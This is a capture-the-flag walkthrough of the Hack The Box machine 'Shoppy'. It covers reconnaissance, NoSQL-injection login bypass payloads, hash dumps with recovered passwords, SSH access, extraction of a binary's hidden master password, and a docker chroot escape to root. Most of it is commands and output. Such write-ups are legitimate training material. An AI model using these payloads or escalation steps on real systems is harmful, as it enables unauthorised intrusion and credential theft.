Shoppy

Recon

nmap_scan.log

Open 10.129.227.233:22
Open 10.129.227.233:80
Open 10.129.227.233:9093
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.227.233

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDApZi3Kltv1yDHTatw6pKZfuIcoHfTnVe0W1yc9Uw7NMUinxjjQaQ731J+eCTwd8hBcZT6HQwcchDNR50Lwyp2a/KpXuH2my+2/tDvISTRTgwfMy1sDrG3+KPEzBag07m7ycshp8KhrRq0faHPrEgcagkb5T8mnT6zr3YonzoMyIpT+Q1O0JAre6GPgJc9im/tjaqhwUxCH5MxJCKQxaUf2SlGjRCH5/xEkNO20BEUYokjoAWwHUWjK2mlIrBQfd4/lcUzMnc5WT9pVBqQBw+/7LbFRyH4TLmGT9PPEr8D8iygWYpuG7WFOZlU8oOhO0+uBqZFgJFFOevq+42q42BvYYR/z+mFox+Q2lz7viSCV7nBMdcWto6USWLrx1AkVXNGeuRjr3l0r/698sQjDy5v0GnU9cMHeYkMc+TuiIaJJ5oRrSg/x53Xin1UogTnTaKLNdGkgynMqyVFklvdnUngRSLsXnwYNgcDrUhXxsfpDu8HVnzerT3q27679+n5ZFM=
|   256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHiKrH/B/4murRCo5ju2KuPgkMjQN3Foh7EifMHEOwmoDNjLYBfoAFKgBnrMA9GzA+NGhHVa6L8CAxN3eaGXXMo=
|   256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBRsWhJQCRHjDkHy3HkFLMZoGqCmM3/VfMHMm56u0Ivk
80/tcp   open  http    syn-ack nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.23.1
9093/tcp open  http    syn-ack Golang net/http server
|_http-title: Site doesn't have a title (text/plain; version=0.0.4; charset=utf-8).
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Sun, 08 Dec 2024 11:56:52 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 4
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 4
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 3.0577e-05
|     go_gc_duration_seconds{quantile="0.25"} 0.000174617
|_    go_gc_du
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: FD9E8D8302B1619B431F6356984201A1
|_http-trane-info: Problem with XML parsing of /evox/about
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

HTTP (80)

Writeup.png

Feroxbuster almost crashed the server, but it found login page.

└─$ feroxbuster -u 'http://shoppy.htb/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -D -C 400,404 -S 2066 -k --thorough -I .js,.css,.png
...
302      GET        1l        4w       28c http://shoppy.htb/admin => http://shoppy.htb/login
...

admin:admin didn't work

Writeup-1.png

No credentials so can't proceed. admin' AND 1=1 -- - took like year to return response, but that might be related to special chars in fields.

└─$ domain='shoppy.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fl 8
Nothing
└─$ domain='shoppy.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -fl 8
Nothing
└─$ domain='shoppy.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/n0kovo_subdomains.txt -mc all -fl 8
mattermost              [Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 86ms]

Writeup-2.png

After too much fuzzing finally the application crashed and gave backtrace instead of Gateway Timeout. Reason for testing NoSQLi was because it accepted json data, and most probably it would work.

Writeup-3.png

Username: jaegar

The application probably crashed and each time it took like 2-3 minutes to restart and get response 💀

https://book.hacktricks.xyz/pentesting-web/nosql-injection#sql-mongo

Finally something worked.....

{"username":"x' || '1'=='1","password":"x"}     // Failed
{"username":"admin' || '1'=='1","password":"x"} // Worked

Writeup-4.png

Writeup-5.png

If we search for admin user we can export details, password is not found in crackstation

[{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"}]

Try NoSQLi payload again

admin' || 'a'=='a

[
  {
    "_id": "62db0e93d6d6a999a66ee67a",
    "username": "admin",
    "password": "23c6877d9e2b564ef8b32c3a23de27b2"
  },
  {
    "_id": "62db0e93d6d6a999a66ee67b",
    "username": "josh",
    "password": "6ebcea65320589ca4f2f1ce039975995"
  }
]

Writeup-6.png

Creds: josh:remembermethisway

We can now login in chat application

Writeup-7.png

Creds: jaeger:Sh0ppyBest@pp!

SSH

└─$ sshpass -p 'Sh0ppyBest@pp!' ssh jaeger@shoppy.htb
jaeger@shoppy:~$ id
uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)

User.txt

jaeger@shoppy:~$ cat user.txt
968fb59421e41468298ce64891e4f3ac

Privilege Escalation (deploy)

jaeger@shoppy:~$ sudo -l
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager

With strings we can take a look at what' happening and luckily for us different encoding shows the password in plaintext

jaeger@shoppy:/home/deploy$ strings /home/deploy/password-manager | grep -v '^[._;\[]'
/lib64/ld-linux-x86-64.so.2
system
libstdc++.so.6
libgcc_s.so.1
libc.so.6
GCC_3.0
GLIBC_2.2.5
CXXABI_1.3
GLIBCXX_3.4
GLIBCXX_3.4.21
u/UH
Welcome to Josh password manager!
Please enter your master password:
Access granted! Here is creds !
cat /home/deploy/creds.txt
Access denied! This incident will be reported !
zPLR
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
completed.0
frame_dummy
password-manager.cpp
DW.ref.__gxx_personality_v0
system@GLIBC_2.2.5

jaeger@shoppy:/home/deploy$ strings /home/deploy/password-manager -el | grep -v '^[._;\[]'
Sample

jaeger@shoppy:/home/deploy$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!

Privilege Escalation (root)

https://gtfobins.github.io/gtfobins/docker/

└─$ sshpass -p 'Deploying@pp!' ssh deploy@shoppy.htb
$ id
uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker)
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cd /root
# ls
root.txt

Root.txt

# cat root.txt
f4f64720a859b9f098c1de4ac8139dcd